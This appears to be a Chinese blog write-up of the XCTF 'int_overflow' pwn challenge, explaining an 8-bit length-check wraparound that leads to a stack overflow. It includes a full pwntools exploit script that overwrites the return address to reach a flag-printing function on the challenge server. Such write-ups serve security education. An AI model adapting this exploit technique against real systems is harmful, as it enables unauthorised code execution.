攻防世界pwn int_overflow writeup

最新推荐文章于 2022-12-21 21:54:54 发布
最新推荐文章于 2022-12-21 21:54:54 发布
阅读量1.8k 收藏 2
点赞数
文章标签: pwn 整数溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/94974853
版权

这是一道整数溢出题

我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。
拿到题目,我们首先查看一下源代码的保护情况:
在这里插入图片描述
从上图可以看出,这是一个32位的程序,并且只开了堆栈不可执行的保护。
我们使用IDA查看一下源码:
在这里插入图片描述
我们进入这个check_passwd函数:
在这里插入图片描述

当v3>3u且v3<8u时,我们可以进入下面的else中。

else中把s的值复制到dest,如果s的值够长,就能造出栈溢出。
但是3<v3<8限制了s的长度了,怎么办呢?我们可以看一下汇编代码:
在这里插入图片描述
在检测s的长度之后,我们可以看到程序把s放到一个al寄存器中,al是一个八位寄存器,

我们知道,八位寄存器对于无符号整数来说是有0~255的范围的

这就是这题整数溢出的关键所在了。
我们找到了溢出点,然后就让我们看看有什么代码是可以利用的:
在这里插入图片描述
果然这里有一个cat flag,跳转到这个地址就可以得到我们想要的flag了!
下面是完整exp:

#! /usr/bin/env python
from pwn import *
p=remote('111.198.29.45',33613)
sys_addr=0x0804868B
payload='a'*24+p32(sys_addr)
payload=payload.ljust(262,'a')
p.recvuntil("Your choice:")
p.sendline("1")
p.recvuntil("Please input your username:\n")
p.sendline("aaaa")
p.recvuntil("Please input your passwd:\n")
p.sendline(payload)
p.interactive()
PLpa、
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
攻防世界pwn-int_overflow
a_silly_coder的博客
05-14 240
下载文件后首先检查保护,发现不存在canary,可以进行栈溢出。 将文件拖入ida32位进行查看,发现是一个简单的登录。 首先在login()中输入账号和密码,发现passwd存在buf中,可输入长度有0x199,然后传入check_passwd()函数中。 然后在check_passwd中将0x199长度的buf复制给dest,但是dest距离ebp只有0x14,我们也在文件中发现了cat flag的函数,所以思路就很清晰了,在输入密码时,输入一个长字符串,在check_passwd函数..
攻防世界 int_overflow
09-28 740
1.题目 2.IDA反汇编C程序 3.流程分析 首先,选择login或者退出,选择login,则输入名字和密码,然后校验密码长度,长度小于等于3或者大于8等密码错误,否则成功。 但是看到这里,会有疑问,成功了之后呢?flag呢?在IDA的function view查找,发现一个函数what_is_this。一个存在于原函数但是我们程序流程里面没有调用过的函数。于是思路立马清晰了。我们需要通过栈溢出来覆盖返回地址,将函数what_is_this的地址覆盖到返回地址上。 接..
python安装pwn_CTF-Pwn-[BJDCTF 2nd] r2t3
weixin_42523792的博客
01-04 185
CTF-Pwn-[BJDCTF 2nd] r2t3博客说明文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!CTP平台网址https://buuoj.cn/challenges题目Pwn类,[BJDCTF 2nd] r2t3下载题目的文件R2t3思路使用file命令查看,发现是32位的文件,使用ida...
PWN-整数溢出
recover517的博客
12-06 1712
一、特殊数字 二、整数字节对照表 三、溢出类漏洞 四、符号转换类漏洞
攻防世界pwn——int_overflow
qq_62076255的博客
09-28 234
攻防世界pwn——int_overflow
攻防世界PWN int_overflow
Rt1Text的博客
03-27 603
checksec (老规矩) 32位 canary/NX保护 ida操作 if (v4 == 1) 满足这个条件,login 跟进去 s 字段写入0x19u 看看是否存在溢出 0x28,看来不存在 buf 段 0x199u check_passwd函数 v3 无符号整型 8字节 满足if条件即可 success 将s放到dest中 dest 的长度为0x14 让s的长度够大,把what_is_this()/有flag的地址覆盖到返...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
攻防世界pwn第一题
Greic的博客
11-26 2217
emmmmm,本人是一只刚刚学pwn的菜鸟(看写的题目也知道),这也算是自己第一次写pwn题吧,想保持一下,因此便有了此篇博客。话不多说,我们开始。 首先创建生成模拟环境,下载附件。 查看保护类型(什么都没有,233333) 习惯性拖进IDA看看,由于汇编才刚刚开始,所以还是按F5看C语言源代码算了。然后,果然,运行就能给flag 最后链接靶机???(不知道叫啥,就叫这个算了),然后就这样出来了,就是要稍微注意一下,链接的时候需要把55775前面的:去掉。 好啦,就这样写完了,...
攻防世界pwn——pwn1
qq_62076255的博客
12-21 436
做题记录
攻防世界_pwn int_overflow(萌新版)
TedLau的博客
02-24 477
首发于鄙人博客:传送门 0x00 前言 重刷攻防世界,本人纯萌新,在本次刷题过程中,不能再想之前那样,做过就忘,我打算将我的思路尽可能的写成文章发在网站。 0x10 步骤 file与checksec步骤已省略 根据反汇编的意思,便可以知道buf的长度比dest的长度长,所以在strcpy的时候会发生溢出现象。 而如果我们的s的长度在3和8之间,那么我们便无法使得s...
PWN-整型溢出-攻防世界-PWN-int_overflow
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 1855
目录 整型溢出漏洞是什么 攻防世界-PWN-int_overflow exp 整型溢出漏洞是什么 整型是一个特定的变量类型,在32位的系统中,一个整数一般占32位,而在64位的系统中一个整数占64位,(下面主要介绍32位整型溢出)为了表示正负(有符号),需要最高位来决定数值的,下面列举一些常见的整型的数值范围 在c语言中有这样的规定: 对于unsigned整型的溢出溢出之后的数会和2^(8*字节)作模运算,例如一个unsigned char 溢出了,就会把溢出的数值与256求模 .
攻防世界pwn(4)
weixin_44319142的博客
04-12 641
int_overflow level3
int_overflow(xctf)
weixin_43868725的博客
05-06 564
0x0 程序保护和流程 保护: 流程: main() login() check_passwd() 分析流程可知当我们输入的passwd的长度在3~7之间时可以将passwd复制到dest中。而用来储存passwd的长度的变量是无符号的int8。int8能储存的最大值是255。超过255就会回到0。 0x1 漏洞利用 根据判断可以将passwd的长度控制在259~263之间就可以完成利用了...
攻防世界 int_overflow 超超超详细
PushSafe
10-23 2619
pwn纯新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
[攻防世界 pwn]——int_overflow
Y_peak的博客
02-19 185
[攻防世界 pwn]——int_overflow 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX 在IDA中看看, 发现了后面函数和可以gets函数, 不过可惜这个gets函数无法栈溢出。不过我们看到在check_passwd函数中有strcpy函数, dest是可以栈溢出的, 不过前题是我们可以绕过检查。 看了下 , 判断的v3是储存在al这个8位寄存器中, 也就是一个字节。当然也可以从_int8看出来是一个字节 0~255。所
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值